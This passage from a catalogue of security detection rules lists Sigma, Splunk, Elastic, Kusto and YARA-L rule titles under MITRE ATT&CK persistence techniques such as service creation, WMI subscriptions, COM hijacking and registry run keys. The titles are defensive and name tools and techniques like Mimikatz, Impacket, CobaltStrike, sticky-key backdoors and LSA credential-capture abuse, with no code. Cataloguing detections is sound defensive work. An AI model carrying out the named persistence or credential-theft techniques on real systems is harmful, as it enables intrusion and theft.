- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
Create or Modify System Process: Windows Service T1543.003 108 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma Turla PNG Dropper Service test
- Sigma Turla Service Install test
- Sigma Uncommon Service Installation Image Path test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Sigma Vulnerable HackSys Extreme Vulnerable Driver Load test
- Sigma Vulnerable WinRing0 Driver Load test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows KrbRelayUp Service Creation production
- Splunk Windows Remote Create Service production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows Service Create RemComSvc production
- Splunk Windows Service Create with Tscon production
- Splunk Windows Service Creation on Remote Endpoint production
- Splunk Windows Service Initiation on Remote Endpoint production
- Elastic Windows Service Installed via an Unusual Client production
- Splunk Windows Suspicious Driver Loaded Path production
- Splunk Windows Vulnerable Driver Installed production
- Splunk Windows Vulnerable Driver Loaded production
- Splunk XMRIG Driver Loaded production
Create or Modify System Process: Launch Daemon T1543.004 1 rule
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
Event Triggered Execution T1546 139 rules
- Splunk Access Common Package Config file (EDR)
- Splunk Access Common Package Config file (PowerShell)
- Splunk Access Common Package Config file (Sysmon)
- Splunk Access Common Package Config file (Windows Event Log)
- Sigma AdminSDHolder permissions changed for persistence experimental
- Kusto Caramel Tsunami Actor IOC - July 2021 available
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma COM Hijack via Sdclt test
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Control Panel Items test
- Splunk Detect WMI Event Subscription Persistence production
- Sigma HAFNIUM Exchange Exploitation Activity test
- Elastic Image File Execution Options Injection production
- Elastic Installation of Custom Shim Databases production
- Kusto Modification of Accessibility Features
- Elastic Mofcomp Activity production
- Sigma MSSQL Extended Stored Procedure Backdoor Maggie test
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Sigma New DLL Added to AppCertDlls Registry Key test
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma New Outlook Macro Created test
- Sigma Outlook Macro Execution Without Warning Setting Enabled test
- Splunk Overwriting Accessibility Binaries production
- Sigma Path To Screensaver Binary Modified test
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Persistence via WMI Event Subscription production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via GlobalFlags test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting test
- Sigma Potential Persistence Via PowerShell User Profile Using Add-Content test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Elastic Potential RemoteMonologue Attack production
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Execute COM Object production
- Sigma PowerShell Profile Modification test
- Sigma Powershell WMI Persistence test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Registry Keys Used For Privilege Escalation production
- Sigma Registry Modification of MS-settings Protocol Handler test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Splunk Screensaver Event Trigger Execution production
- Sigma Session Manager Autorun Keys Modification test
- Sigma Shell Open Registry Keys Manipulation test
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma SOURGUM Actor Behaviours test
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
- Sigma Suspicious Get-Variable.exe Creation test
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Sigma Suspicious Outlook Macro Created test
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Suspicious Shim Database Patching Activity test
- Elastic Suspicious WerFault Child Process production
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
- Elastic Uncommon Registry Persistence Change production
- Sigma VsCode Powershell Profile Modification test
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows AD AdminSDHolder ACL Modified production
- Splunk Windows AppCertDLL Modification Via Command Line production
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows COM Hijacking InprocServer32 Modification production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Event Triggered Image File Execution Options Injection production
- Splunk Windows MOF Event Triggered Execution via WMI production
- Splunk Windows New Default File Association Value Set production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
- Sigma Writing Local Admin Share test
- Kusto Zinc Actor IOCs files - October 2022 available
Event Triggered Execution: Change Default File Association T1546.001 7 rules
- Sigma Change Default File Association To Executable Via Assoc test
- Sigma Change Default File Association Via Assoc test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Shell Open Registry Keys Manipulation test
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Splunk Windows Change File Association Command To Notepad production
- Splunk Windows New Default File Association Value Set production
Event Triggered Execution: Screensaver T1546.002 6 rules
- Sigma Path To Screensaver Binary Modified test
- Splunk Screensaver Event Trigger Execution production
- Sigma Suspicious ScreenSave Change by Reg.exe test
- Sigma Suspicious Screensaver Binary File Creation test
- Elastic Uncommon Registry Persistence Change production
- Sigma Writing Local Admin Share test
Event Triggered Execution: Windows Management Instrumentation Event Subscription T1546.003 23 rules
- Splunk Detect WMI Event Subscription Persistence production
- Elastic Mofcomp Activity production
- Sigma New ActiveScriptEventConsumer Created Via Wmic.EXE test
- Elastic Persistence via WMI Event Subscription production
- Sigma Potential Remote WMI ActiveScriptEventConsumers Activity test
- Sigma Powershell WMI Persistence test
- Sigma Suspicious Encoded Scripts in a WMI Consumer test
- Elastic Suspicious WMI Event Subscription Created production
- Sigma System crash behavior manipulation - WMImplant (registry) experimental
- Splunk Windows MOF Event Triggered Execution via WMI production
- Sigma WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load test
- Sigma WMI Backdoor Exchange Transport Agent test
- Sigma WMI Event Subscription test
- Splunk WMI Permanent Event Subscription - Sysmon production
- Sigma WMI Persistence test
- Sigma WMI Persistence - Command Line Event Consumer test
- Sigma WMI Persistence - Script Event Consumer test
- Sigma WMI Persistence - Script Event Consumer File Write test
- Sigma WMI Persistence - Security test
- Sigma WMI registration experimental
- Sigma WMI registration (PowerShell) experimental
- Splunk WMI subscription execution (Sysmon)
- Splunk WMI subscription execution (Windows Event Log)
Event Triggered Execution: Netsh Helper DLL T1546.007 7 rules
- Elastic Netsh Helper DLL production
- Sigma Netsh helper DLL abuse (process) experimental
- Sigma Netsh helper DLL abuse (Reg via Sysmon) experimental
- Sigma New Netsh Helper DLL Registered From A Suspicious Location test
- Sigma Potential Persistence Via Netsh Helper DLL test
- Sigma Potential Persistence Via Netsh Helper DLL - Registry test
- Sigma Potential Suspicious Activity Using SeCEdit test
Event Triggered Execution: Accessibility Features T1546.008 22 rules
- Splunk Command Line Utility Added to Accessibility Features (PowerShell)
- Splunk Command Line Utility Added to Accessibility Features (Sysmon)
- Splunk Command Line Utility Added to Accessibility Features (Windows Event Log)
- Kusto Modification of Accessibility Features
- Splunk Overwriting Accessibility Binaries production
- Sigma Persistence Via Sticky Key Backdoor test
- Elastic Potential Modification of Accessibility Binaries production
- Sigma Potential Privilege Escalation Using Symlink Between Osk and Cmd test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Stickey key called CMD via command execution experimental
- Sigma Stickey key called CMD via command execution (hash detection) experimental
- Sigma Stickey key IFEO (Reg via command) experimental
- Sigma Stickey key IFEO registry changed (Reg via Sysmon) experimental
- Sigma Sticky key file created from CMD copy experimental
- Sigma Sticky Key Like Backdoor Execution test
- Sigma Sticky Key Like Backdoor Usage - Registry test
- Sigma Sticky key sethc command for replacement by CMD experimental
- Sigma Sticky key sethc file failed replacement experimental
- Sigma Suspicious Debugger Registration Cmdline test
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Sysmon)
- Splunk Suspicious Execution of Accessibility Tool Debuggers (Windows Event Log)
Event Triggered Execution: AppCert DLLs T1546.009 5 rules
- Sigma New DLL Added to AppCertDlls Registry Key test
- Elastic Registry Persistence via AppCert DLL production
- Kusto Registry Persistence via AppCert DLL Modification available
- Sigma Session Manager Autorun Keys Modification test
- Splunk Windows AppCertDLL Modification Via Command Line production
Event Triggered Execution: AppInit DLLs T1546.010 3 rules
- Sigma New DLL Added to AppInit_DLLs Registry Key test
- Elastic Registry Persistence via AppInit DLL production
- Kusto Registry Persistence via AppInit DLLs Modification available
Event Triggered Execution: Application Shimming T1546.011 11 rules
- Elastic Installation of Custom Shim Databases production
- Elastic Potential Application Shimming via Sdbinst production
- Sigma Potential Persistence Via AppCompat RegisterAppRestart Layer test
- Sigma Potential Persistence Via Shim Database In Uncommon Location test
- Sigma Potential Persistence Via Shim Database Modification test
- Sigma Potential Shim Database Persistence via Sdbinst.EXE test
- Splunk Registry Keys for Creating SHIM Databases production
- Splunk Shim Database File Creation production
- Splunk Shim Database Installation With Suspicious Parameters production
- Sigma Suspicious Shim Database Patching Activity test
- Sigma Uncommon Extension Shim Database Installation Via Sdbinst.EXE test
Event Triggered Execution: Image File Execution Options Injection T1546.012 10 rules
- Elastic Image File Execution Options Injection production
- Sigma Potential Persistence Via App Paths Default Property test
- Sigma Potential Persistence Via GlobalFlags test
- Splunk Registry Keys Used For Privilege Escalation production
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Elastic Suspicious WerFault Child Process production
- Elastic Uncommon Registry Persistence Change production
- Elastic Werfault ReflectDebugger Persistence production
- Splunk Windows Event Triggered Image File Execution Options Injection production
Event Triggered Execution: Component Object Model Hijacking T1546.015 22 rules
- Sigma COM Hijacking via TreatAs test
- Sigma COM Object Hijacking Via Modification Of Default System CLSID Default Value experimental
- Elastic Component Object Model Hijacking production
- Kusto Component Object Model Hijacking - Vault7 trick available
- Sigma Potential COM Object Hijacking Via TreatAs Subkey - Registry test
- Sigma Potential Persistence Using DebugPath test
- Sigma Potential Persistence Via Scrobj.dll COM Hijacking test
- Sigma Potential PSFactoryBuffer COM Hijacking test
- Elastic Potential RemoteMonologue Attack production
- Splunk Powershell COM Hijacking InprocServer32 Modification production
- Splunk Powershell Execute COM Object production
- Sigma Rundll32 Registered COM Objects test
- Splunk Rundll32 Spawned by Disk Cleanup (Sysmon)
- Splunk Rundll32 Spawned by Disk Cleanup (Windows Event Log)
- Sigma SOURGUM Actor Behaviours test
- Splunk Suspicious DLLhost Execution (EDR)
- Splunk Suspicious DLLhost Execution (PowerShell)
- Splunk Suspicious DLLhost Execution (Windows Event Log)
- Sigma Suspicious GetTypeFromCLSID ShellExecute test
- Splunk Suspicious InprocServer32 Registry Modification (Sysmon)
- Splunk Suspicious InprocServer32 Registry Modification (Windows Event Log)
- Splunk Windows COM Hijacking InprocServer32 Modification production
Boot or Logon Autostart Execution T1547 154 rules
- Splunk Active Setup Registry Autostart production
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Add Port Monitor Persistence in Registry test
- Splunk Additional dll added to Spool Driver (Sysmon)
- Splunk Additional dll added to Spool Driver (Windows Event Log)
- Sigma Atbroker Registry Change test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Sigma Desktop.INI Created by Uncommon Process test
- Kusto Detect Print Processors Registry Driver Key Creation/Modification available
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Sigma DLL Load via LSASS test
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Kusto Imminent Ransomware available
- Elastic Installation of Security Support Provider production
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript
- Kusto Midnight Blizzard - suspicious rundll32.exe execution of vbscript (Normalized Process Events)
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Splunk Monitor Registry Keys for Print Monitors production
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New Custom Shim Database Created test
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Elastic Potential Persistence via Time Provider Modification production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential RipZip Attack on Startup Folder test
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence Mechanisms in Recycle Bin test
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious Driver Install by pnputil.exe test
- Sigma Suspicious GrpConv Execution test
- Elastic Suspicious Module Loaded by LSASS production
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma System Scripts Autorun Keys Modification test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Splunk Time Provider Persistence Registry production
- Elastic Uncommon Registry Persistence Change production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Sigma Windows Network Access Suspicious desktop.ini Action test
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Splunk Windows Security Support Provider Reg Query production
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
- Sigma Windows Terminal Profile Settings Modification By Uncommon Process test
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma WINEKEY Registry Modification test
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 84 rules
- Splunk Add DLL_EXE Registry Value (Sysmon)
- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
